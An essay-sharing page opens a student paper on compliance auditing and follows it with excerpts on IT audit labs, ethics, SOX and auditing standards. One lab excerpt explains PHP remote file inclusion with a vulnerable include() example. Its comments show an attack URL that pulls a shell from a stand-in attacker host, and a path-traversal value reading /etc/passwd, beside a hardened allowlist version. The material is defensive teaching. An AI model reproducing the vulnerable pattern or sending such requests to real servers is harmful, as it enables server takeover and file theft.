
Compliance Auditing


Submitted By diggy
Project: Compliance Auditing | Final Draft | Advanced Auditing

OUTLINE

I. Compliance Audits
   a. Objective, Scope, and Methodology
   b. Regulations
II. Features & Benefits
   a. Assessment of overall security
   b. Exposures that create the greatest risk
   c. Internal Controls
III. The Compliance Audit Process
   a. Interviews and Reviews
   b. Preparation
   c. Procedural Component
IV. Conclusion

Compliance Auditing

Compliance auditing determines whether a process or transaction has or has not followed the applicable rules. If rules are violated, the auditor determines the cause and recommends ways to prevent future deviations. The rules being tested can be those the organization created for itself through corporate by-laws, policies, plans, and procedures; those imposed on the organization by external laws and regulations; or external standards the organization has chosen to follow. In addition, compliance auditors gather evidence of fraudulent or abusive activity affecting governmental entities. Those audits are designed to detect and deter the misappropriation of public assets and to reduce future fraud risk. (Associates, 2003)
Compliance auditors must be able to research issues effectively using authoritative materials, apply the knowledge gained to the circumstances being tested, and explain to the organization what compliance means in day-to-day operations. Reaching a conclusion that an outcome complies or does not comply with a standard is not necessarily simple, especially in domains governed by complex regulations (e.g. occupational health and safety, environmental, employment practices, health care, insurance, federal grants and contracts, employee pensions and benefits, federal tax).

Similar Documents


Auditing It Infrastructures for Compliance

...and combine them into one final report. These reports will consist of:
- The two auditing frameworks or hardening guidelines/security checklists used by the DoD.
- How a security assessment addressing modern-day risks, threats, and vulnerabilities throughout the seven domains of a typical IT infrastructure can help an organization achieve compliance.
- How to gather the information needed to perform a GLBA Financial Privacy and Safeguards Rules compliance audit, and what must be covered.
- The top Workstation Domain risks, threats, and vulnerabilities, including possible causes and mitigations to prevent these issues from happening.
- The top LAN-to-WAN Domain risks, threats, and vulnerabilities, including possible causes and mitigations to prevent these issues from happening.
- The top Remote Access Domain risks, threats, and vulnerabilities, and ways to mitigate these types of issues.
- The top System/Application Domain risks, threats, and vulnerabilities, and ways to mitigate these types of issues.
Part 1: Purpose: The purpose of Part 1 of this lab is to develop an executive summary on either the two auditing frameworks or the hardening guidelines/security checklists used by the DoD. For this, I have chosen to discuss the two auditing frameworks. Background: The AF (Auditing Framework) for the DoD provides a foundation for developing and representing...



Auditing Ethics and Compliance

...Instructions
1. Construct a template that will be the guide throughout the writing process. This will improve how the document looks, feels, and reads. Consistency in these three items is key to a good case study.
2. Draw your reader in with a unique title. It should attract readers and make them want to read more.
3. Begin writing the paper. Start by identifying the problem that is being explored in the case study.
4. Explore the problem, including cause, effect, and theory. Give as much background as possible.
5. Discuss the possible solution and/or how this issue was specifically resolved. Tell what methods were used in the process.
6. Describe the benefits of the study. Tell how the benefits overall affect the group at which your case study is aimed.
7. Utilize the general-to-specific-to-general approach. This is the approach to use because it draws the reader in, demonstrates a specific example, and then shows how it applies to the group as a whole. It also shows readers how they can address their own problem this way.
Tips & Warnings
• Use facts and numbers where possible. This is specifically aimed at the benefits portion of the case study. Potential readers will be compelled by the numbers and how they are affected by them, and will remain interested.
• Use photos if necessary. If photos are used, be sure they are professionally done so as not to sully the quality of the case study.
• Have an executive sign off...



Auditing It Infrastructures Compliance

...In the given table, you need to fill in the name of the laws and, correspondingly, the sector related to each law. You need to provide a rationale for the compliance laws with which a public or a private organization may have to comply.

| Compliance Law | Description of Compliance Law | Rationale for Using this Law |
| Sarbanes-Oxley Act (SOX) | This act is the result of the Public Company Accounting Reform and Investor Protection Act. It mandates many reforms to enhance corporate responsibility and financial disclosure and to prevent fraud. | Corporate accountability and responsibility. |
| Health Insurance Portability and Accountability Act (HIPAA) | Provides for helping citizens maintain their health insurance coverage. Improves the efficiency and effectiveness of the American... | Health care; protection of health insurance coverage. |



Auditing and Compliance Lab 4

...1. What is a PHP Remote File Include (RFI) attack, and why are these prevalent in today's Internet world?
RFI stands for Remote File Inclusion. It occurs when a PHP script passes untrusted input (typically a URL parameter) to include() or require() without validation, so an attacker can make the server fetch and execute a file hosted on a server the attacker controls. The vulnerability stems from poor input validation and can lead to code execution on the server, or to injecting script into the pages served to users (an XSS attack using JavaScript). RFI is a common vulnerability, and website attacks are by no means limited to SQL injection: using RFI an attacker can deface the website, gain access to the server, and do almost anything the web server account is permitted to do. What makes it more dangerous is that only common sense and basic knowledge of PHP are needed to execute it.
2. What country is the top host of SQL Injection and SQL Slammer infections? Why can't the US Government do anything to prevent these injection attacks and infections?
The U.S. is the top host of SQL Injection and SQL Slammer infections. Cybercriminals have made vast improvements to their infrastructure over the last few years; thousands of websites are vulnerable to SQL injection, and malicious code writers have exploited these vulnerabilities to distribute malware so quickly that the government cannot contain such a large quantity.
3. What does it mean to have a policy of Nondisclosure in an organization?
It is a contract in which the parties agree not to disclose information covered by the agreement. It outlines confidential material...
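The include pattern behind question 1, as an added example that is not part of the original lab: a PHP page that passes a request parameter straight to include(), beside a hardened version that only uses the parameter as a lookup key into a fixed allowlist of templates. The page names, the pages/ directory and the attacker URL in the comments are hypothetical.

```php
<?php
// Added example (not from the original lab). Hypothetical page names and paths.

// VULNERABLE: the untrusted "page" parameter is used directly to build the
// include path. With allow_url_include=On (and allow_url_fopen=On), a request
// such as  /index.php?page=http://attacker.example/shell.txt?  makes PHP fetch
// and execute attacker-controlled code on the server (remote file inclusion).
// Even with remote URLs disabled, the same code permits local file inclusion
// through path traversal, e.g. ?page=../../../../etc/passwd%00 on old PHP.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: the request value is never used to build a path. It is only a key
// into an allowlist of known templates; anything not in the list is rejected.
const ALLOWED_PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the absolute template path for a known page name, or null.
function resolve_page(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;
}

function render_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        // Unknown key: refuse rather than guess. Do not echo the raw value back
        // into the page, to avoid reflecting attacker input.
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Entry point when served by a web server (skipped under the CLI).
if (PHP_SAPI !== 'cli') {
    $page = $_GET['page'] ?? 'home';
    render_page_hardened($page);
}
```

Defense in depth for the auditor's checklist: confirm that the PHP configuration has allow_url_include = Off (the default), so include() and require() cannot load URLs at all regardless of application code; `php -i | grep allow_url_include` shows the effective value. The allowlist still matters because it also closes the local-file-inclusion variant, which that setting does not touch.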



Ethics, Compliance Auditing, and Emerging Issues

...Ethics, Compliance Auditing, and Emerging Issues
INTERNAL MEMO
TO: John Doe, CEO
FROM: Glen Leonard
RE: Ethics Program / Training / Compliance Auditing
DATE: February 22, 2016
This memo serves as notice that we will soon initiate efforts to develop and implement an ethics program, as well as the appropriate training and an effective way to monitor those plans. As you are aware, consumers and partners want to work with companies they can trust, and having a program that will build management skills and effectively structure business controls is a great way to become transparent and build that trust. Overall, an effective ethics and compliance program will protect the organization by identifying and preventing inappropriate conduct while promoting adherence to the legal and ethical responsibilities of the organization. The core components of the proposed ethics program will include:
* Establishing Standards and Procedures, which will include the code of conduct, policies, and procedures
* Training and Education, to ensure employees are trained on the code of conduct, policies and procedures, and other programs and objectives that are relevant to the program
* Monitoring, Auditing, and Evaluation, establishing a system to detect and prevent unethical conduct and to ensure the system is effective and being adhered to
To close, with the establishment of an effective ethics program...



Threat to Compliance with Fundamental Principles on Auditing

...Threats to Compliance With The Fundamental Principles
1. Self-interest threat – the threat that a financial or other interest will inappropriately influence the professional accountant's judgment or behavior. Examples of circumstances that may create a self-interest threat include:
a. A direct financial interest or material indirect financial interest in a client
b. A loan or guarantee to or from a client or any of its directors or officers
c. Undue dependence on total fees from a particular client
d. Concern about the possibility of losing the engagement
e. Having a close business relationship with a client
f. Potential employment with a client
g. Contingent fees relating to an engagement
2. Self-review threat – the threat that a professional accountant will not appropriately evaluate the results of a previous judgment made or service performed in forming a conclusion about the subject matter of the engagement. Examples of circumstances that may create a self-review threat include:
a. A member of the engagement team being, or having recently been, a director or officer of the client.
b. A member of the engagement team being, or having recently been, an employee of the client in a position to exert direct and significant influence over the subject matter of the engagement.
c. Performing services for a client that directly affect the subject matter of the engagement.
d. Preparation of original data used to generate financial...



Auditing the System/Application Domain for Compliance

...The System/Application Domain consists of the servers that host server-level applications. Mail servers handle the receipt and sending of e-mail. Database servers host databases that are accessed by users, applications, or other servers. DNS servers resolve names to IP addresses for clients. To protect this domain the following methods should be used: removal of unnecessary services and protocols, changing of default passwords, regular patching and updates, and enabling local firewalls. The major threats to these areas are unauthorized access, hardware failure, and data loss. Since the System/Application Domain consists of all of a business's mission-critical systems, applications, and data, it is important to ensure that this domain is secure at all times. Failure to do so risks the loss of large amounts of sensitive information as well as production ceasing to function. Unauthorized physical access is gaining access to a physical location without permission. This is potentially dangerous because an individual who gained such access could destroy the systems and the data within them. This threat centers on access to places such as data centers that hold a great deal of sensitive information. To prevent unauthorized physical access, policies, standards, procedures, and guidelines must be followed. For example, all guests must be escorted by an employee at all times. Staff should immediately report any suspicious activity and question persons who do not have...



Lab 6: Auditing the Workstation Domain for Compliance

...Lab 6: Auditing the Workstation Domain for Compliance
Question 1 – What are some common risks, threats, and vulnerabilities found in the Remote Access Domain that must be mitigated through a layered security strategy?
a. Some common risks, threats, or vulnerabilities are stolen company laptops, software keyloggers installed on computers that steal passwords and user accounts, data leakage, and unauthorized access to the network.
Question 2 – File-sharing utilities and client-to-client communication applications can provide the ability to share files with other users (i.e. peer-to-peer networking or sharing). What risks and/or vulnerabilities are introduced by these applications?
a. Many of these applications transmit data and credentials in clear text. If a user uses the same password for one of these utilities as for their network login or any other sensitive login, the password can easily be compromised.
Question 3 – Explain how confidentiality can be achieved within the Workstation Domain with security controls and security countermeasures.
a. This can be achieved by using GPOs and WMI filters to push workstation security policies to the computers, such as locking the computer when it is idle for more than 5 minutes, or blocking access to parts of the computer such as the Control Panel.
Question 4 – Explain how data integrity can be achieved within the Workstation Domain with security controls and security countermeasures.
a. Security controls...



Aft2 Task 1

...A. Compliance Status The following executive summary focuses not only on the identified gaps in the current process, but also on the corrective action plan to support compliance in the noted areas of the Communication Standards provided by The Joint Commission (National Patient Safety Goals, 2013). The high risk associated with surgical procedures performed on the wrong site has driven a risk-mitigating approach to the processes involved in these procedures. The goal is to prevent harm to patients having a surgical procedure. The following summary is the current compliance status of the Priority Focus Area of Communication for Nightingale Community Hospital. After review of the specific areas identified in the Priority Focus Area, the following have been identified as requiring further attention: time-outs are routinely performed prior to every procedure (UP 01.03.01) and the procedure site is marked (UP 01.02.01). Based on the evaluation of the Nightingale Community Hospital National Patient Safety Goals for Communication, the current compliance rate for the Universal Protocol Time-Out processes performed hospital-wide indicates a 95% to 100% compliance rate for the year. The graph provided in the Nightingale Community Hospital National Patient Safety Goals Communication assessment provides limited information, as these are hospital-wide percentages. No unit-specific evaluations of performance have been provided in the report. Upon review of the Site Identification and...



Code of Ethics

...CODE OF ETHICS Compliance is the responsibility of all the Company's directors, officers, managers, and employees (Capital One, 2011). One is responsible for learning the details of the policies, procedures, laws, and regulations applicable to one's job and for seeking guidance when needed. It is important to avoid not only misconduct that violates the law, this Code, or Company policies, but also the appearance of impropriety. The fact that a subject is not explicitly addressed in this Code does not relieve an employee of the responsibility to maintain the highest ethical standards under all circumstances. If one has any concern about whether one's actions or inactions could violate a law, it should be discussed with one's manager. While no Code of Ethics can or should replace thoughtful behavior or common sense, it can help cultivate a culture that values and rewards honesty, integrity, and accountability (Avon, n.d.). The principles detailed in the Code will guide employees in "doing the right thing" and in preserving the Company's reputation for acting with integrity at all times. TRADE REGULATION Most states have enacted trade regulation laws to ensure fair competition. These laws prohibit price-fixing and other "anti-competitive agreements, deceptive acts, and unfair competitive methods" (Pension Consulting, n.d.). Some forms of joint activity are legally permissible, but others are not. Under no circumstances should you illegally or improperly...



Regulatory and Compliance Issues Paper

...Regulatory and Compliance Issues Paper During the late 1990s and early 2000s, many companies in the USA were involved in fraudulent activities. These were companies trusted by both the public and their investors; to mention a few, Stanford Financial, WorldCom, Enron, Tyco, and Madoff intentionally and fraudulently misled their shareholders and the public. In an effort to curtail these financial scandals, the US Congress enacted the Sarbanes-Oxley Act in 2002. The Sarbanes-Oxley (SOX) Act was enacted by the United States Congress to protect shareholders and the public from fraudulent accounting practices and errors. SOX helps to regulate, improve standards, and strengthen corporate governance. The Sarbanes-Oxley Act created an oversight body called the Public Company Accounting Oversight Board (PCAOB). "The Public Company Accounting Oversight Board (also known as the PCAOB) is a private-sector, nonprofit corporation created by the Sarbanes-Oxley Act of 2002 to oversee accounting professionals who provide independent audit reports for publicly traded companies" (http://www.sec.gov). Do you think that the creation and work of the Public Company Accounting Oversight Board (PCAOB) has resulted in greater independence of auditors of public companies? As SOX established the PCAOB, the US Congress gave the Securities and Exchange Commission (SEC) explicit oversight authority...



Information Systems Auditing (Pengauditan Sistem Informasi)

...INFORMATION SYSTEMS AUDITING
Haryono, MCom, Ak
Why study Information Systems and Information Technology?
• Vital component of successful businesses
• Helps businesses expand and compete
• Businesses use IS and IT to improve the efficiency and effectiveness of business processes, for managerial decision making, and for workgroup collaboration
• IS and IT change business processes dramatically
IT Inside the Organization
[Diagram: SIMASTERGAMA case study, the UGM University Enterprise System. Information for executives (Rector, Vice Rectors, Directors); information for managers (Head of Administration, Division/Section Heads); information for operations (Front Office). Modules/applications: Academics, HR, Payroll, Library, Accounting, etc. Faculties: Biology, Economics and Business, Social and Political Sciences, Pharmacy, Medicine, Agriculture.]
Transition of IS Governance: from poor IS governance to good IS governance
Need for Audit of Information Systems
Information System Auditing: "IS Auditing is the process of collecting and evaluating evidence to determine whether a computer system safeguards assets, maintains data integrity, allows organizational goals to be achieved effectively, and uses resources efficiently" (Weber, 1999)
Objectives of IS Auditing: evaluate and improve asset safeguarding, data integrity, system effectiveness, and system efficiency
Information Technology Auditing: IT audits provide...



Auditing

...CHAPTER 2 OVERVIEW OF AUDITING I. Review Questions 1. One definition of auditing is that it is a systematic process by which a competent, independent person objectively obtains and evaluates evidence regarding assertions about economic actions and events to ascertain the degree of correspondence between those assertions and established criteria and communicating the results to interested users. The Philippine Standards on Auditing (PSA) 120 “Framework of Philippine Standards on Auditing” states the objective of an audit as follows: “The objective of an audit of financial statements is to enable the auditor to express an opinion whether the financial statements are prepared in all material respects, in accordance with an identified financial reporting framework.” 2. This apparent paradox arises from the distinction between the function of auditing and the function of accounting. The accounting function is the process of recording, classifying and summarizing economic events to provide relevant information to decision makers. The rules of accounting are the criteria used by the auditor for evaluating the presentation of economic events for financial statements and he or she must therefore have an understanding of generally accepted accounting principles (GAAP), as well as generally accepted auditing standards (GAAS). The accountant need not, and frequently does not, understand what auditors do, unless he or she is involved in doing audits, or has been trained...



Ethics

...Central Texas Professor: Marshell J. Silva Ethics Auditing By definition, an ethics audit is a "systematic evaluation of an organization's ethics program and/or performance to determine its effectiveness." The concept of ethics auditing is fairly new and few companies have conducted an ethics audit. However, performing such audits will likely become more mainstream as recent legislation encourages greater ethical accountability, requiring companies to demonstrate that they are abiding by the law and have established programs to improve their ethical decision making. The U.S. Sentencing Commission (the "Commission") has amended the Federal Sentencing Guidelines for Organizations ("FSGO") so that an effective compliance and ethics program must "exercise due diligence to prevent, detect, and report criminal conduct and otherwise promote an organizational culture that encourages ethical conduct and a commitment to compliance with all applicable law." The Commission noted seven minimum requirements of an effective ethics program: standards and procedures to prevent and detect criminal conduct; responsibility at all levels of the program, together with adequate program resources and authority for its managers; due diligence in hiring and assigning personnel to positions with substantial authority; communicating standards and procedures, including a specific requirement for training at all levels; monitoring, auditing, and non-retaliatory internal guidance/reporting...



Audit

...CHAPTER 1 Introduction to Auditing SOLUTIONS FOR REVIEW CHECKPOINTS 1-1 Auditors add credibility to financial information provided by the accountable party, such as management (i.e. auditors make the financial or other information more likely to be true). Other common ways of characterizing this property of audited numbers are that the numbers are more accurate, have higher assurance, or are more reliable. These relate to different dimensions of truthfulness, as we discuss later in the text. 1-2 Auditing is the verification of numbers provided by others. To attest means to lend credibility to, or to vouch for, the truth or accuracy of the statements that one party makes to another. The attest function is a term often applied to the activities of independent PAs when acting as auditors of financial statements. Since financial statements are prepared by managers of an entity who have authority and responsibility for financial success or failure, an outsider may be skeptical that the statements are objective, free from bias, fully informative, and free from material error, whether intentional or inadvertent. The audit opinion of an independent PA auditor helps resolve those doubts because the auditor's success depends upon an independent, objective, and competent assessment of the conformity of the financial statements with GAAP. The auditor's role is to lend credibility to the statements; hence the outsider will likely seek an independent audit opinion. 1-3 Client:...
